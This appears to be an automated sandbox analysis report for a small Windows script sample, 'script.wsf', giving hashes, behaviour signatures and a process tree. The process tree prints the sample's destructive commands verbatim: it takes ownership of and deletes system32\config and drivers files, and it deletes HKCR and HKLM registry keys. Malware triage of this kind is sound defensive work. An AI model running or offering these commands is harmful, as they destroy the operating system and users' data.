Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
15-08-2024 21:44
Static task
static1
Behavioral task
behavioral1
Sample
script.wsf
Resource
win7-20240704-en
General
-
Target
script.wsf
-
Size
3KB
-
MD5
0355b976d816c3dafeda740c75450a08
-
SHA1
98de5b1ee4c653658966effecf248bf7a8df7cd1
-
SHA256
7786be7dadf8cf4d51607d72cdd3a7f047668c91edfbf5c0623798688d712ab7
-
SHA512
2aa4dd903915d0f7394ebb8b802ad81d2aeda3561d94dc679b693a7e5b32a2f1bf79f0ddffb8971bd61f95b5a68d8bfbb8a5fa361f8580620ad7ab8985210779
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 2732 takeown.exe 2000 takeown.exe 1244 icacls.exe 3144 icacls.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation WScript.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exeicacls.exetakeown.exepid process 2000 takeown.exe 1244 icacls.exe 3144 icacls.exe 2732 takeown.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wermgr.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wermgr.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
wermgr.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU wermgr.exe -
Modifies registry class 2 IoCs
Processes:
cmd.exeOpenWith.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings OpenWith.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 1044 NOTEPAD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
vlc.exepid process 3672 vlc.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
vlc.exepid process 3672 vlc.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
takeown.exesvchost.exedescription pid process Token: SeTakeOwnershipPrivilege 2732 takeown.exe Token: SeTcbPrivilege 4436 svchost.exe Token: SeRestorePrivilege 4436 svchost.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
vlc.exepid process 3672 vlc.exe 3672 vlc.exe 3672 vlc.exe 3672 vlc.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
vlc.exepid process 3672 vlc.exe 3672 vlc.exe 3672 vlc.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
vlc.exeOpenWith.exepid process 3672 vlc.exe 2252 OpenWith.exe 2252 OpenWith.exe 2252 OpenWith.exe 2252 OpenWith.exe 2252 OpenWith.exe 2252 OpenWith.exe 2252 OpenWith.exe 2252 OpenWith.exe 2252 OpenWith.exe 2252 OpenWith.exe 2252 OpenWith.exe 2252 OpenWith.exe 2252 OpenWith.exe -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
cmd.exeWScript.execmd.execmd.execmd.execmd.execmd.exesvchost.exeOpenWith.exedescription pid process target process PID 720 wrote to memory of 4456 720 cmd.exe WScript.exe PID 720 wrote to memory of 4456 720 cmd.exe WScript.exe PID 4456 wrote to memory of 636 4456 WScript.exe cmd.exe PID 4456 wrote to memory of 636 4456 WScript.exe cmd.exe PID 4456 wrote to memory of 3820 4456 WScript.exe cmd.exe PID 4456 wrote to memory of 3820 4456 WScript.exe cmd.exe PID 3820 wrote to memory of 2732 3820 cmd.exe takeown.exe PID 3820 wrote to memory of 2732 3820 cmd.exe takeown.exe PID 636 wrote to memory of 2000 636 cmd.exe takeown.exe PID 636 wrote to memory of 2000 636 cmd.exe takeown.exe PID 636 wrote to memory of 1244 636 cmd.exe icacls.exe PID 636 wrote to memory of 1244 636 cmd.exe icacls.exe PID 3820 wrote to memory of 3144 3820 cmd.exe icacls.exe PID 3820 wrote to memory of 3144 3820 cmd.exe icacls.exe PID 4456 wrote to memory of 1872 4456 WScript.exe cmd.exe PID 4456 wrote to memory of 1872 4456 WScript.exe cmd.exe PID 4456 wrote to memory of 3588 4456 WScript.exe cmd.exe PID 4456 wrote to memory of 3588 4456 WScript.exe cmd.exe PID 4456 wrote to memory of 4572 4456 WScript.exe cmd.exe PID 4456 wrote to memory of 4572 4456 WScript.exe cmd.exe PID 1872 wrote to memory of 4088 1872 cmd.exe reg.exe PID 1872 wrote to memory of 4088 1872 cmd.exe reg.exe PID 3588 wrote to memory of 5016 3588 cmd.exe reg.exe PID 3588 wrote to memory of 5016 3588 cmd.exe reg.exe PID 4572 wrote to memory of 4072 4572 cmd.exe reg.exe PID 4572 wrote to memory of 4072 4572 cmd.exe reg.exe PID 4436 wrote to memory of 728 4436 svchost.exe dashost.exe PID 4436 wrote to memory of 728 4436 svchost.exe dashost.exe PID 2252 wrote to memory of 1044 2252 OpenWith.exe NOTEPAD.EXE PID 2252 wrote to memory of 1044 2252 OpenWith.exe NOTEPAD.EXE
Processes
-
C:\Windows\system32\cmd.execmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\config\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2000
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\config\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\drivers\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\drivers\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg.exe delete HKCR\*.dll /f3⤵
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\system32\reg.exereg.exe delete HKCR\*.dll /f4⤵PID:4088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg.exe delete HKCR\*.exe /f3⤵
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\system32\reg.exereg.exe delete HKCR\*.exe /f4⤵PID:5016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg.exe delete HKLM\* /f3⤵
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Windows\system32\reg.exereg.exe delete HKLM\* /f4⤵
- Modifies registry key
PID:4072
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\system32\dashost.exedashost.exe {1e311568-a5fe-462b-b57c715b317ab229}2⤵PID:728
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\StartComplete.mid"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3672
-
C:\Windows\system32\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "3188" "928" "840" "932" "0" "0" "936" "940" "0" "0" "0" "0"1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:916
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\StartComplete.mid2⤵
- Opens file in notepad (likely ransom note)
PID:1044
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD50355b976d816c3dafeda740c75450a08
SHA198de5b1ee4c653658966effecf248bf7a8df7cd1
SHA2567786be7dadf8cf4d51607d72cdd3a7f047668c91edfbf5c0623798688d712ab7
SHA5122aa4dd903915d0f7394ebb8b802ad81d2aeda3561d94dc679b693a7e5b32a2f1bf79f0ddffb8971bd61f95b5a68d8bfbb8a5fa361f8580620ad7ab8985210779
-
Filesize
79B
MD5edc6cfebfd829729d9fc80aaaf02d193
SHA16d04bf8c7b542301f7eb77eeceed16969053537c
SHA256d0391b24b4bb809ba05a9b9e3fbee72a8b39381b16567de0ca7d9f403211cb47
SHA5128afab19929d1bc3fe4d878ee7dd0b711834e53564afdf8e7d0a7186d1f01b35f5f4aeba4d3c5c964e2fbda08203611dc8bd140b717d3e579dc4b3f1684e3908c
-
Filesize
2B
MD581051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d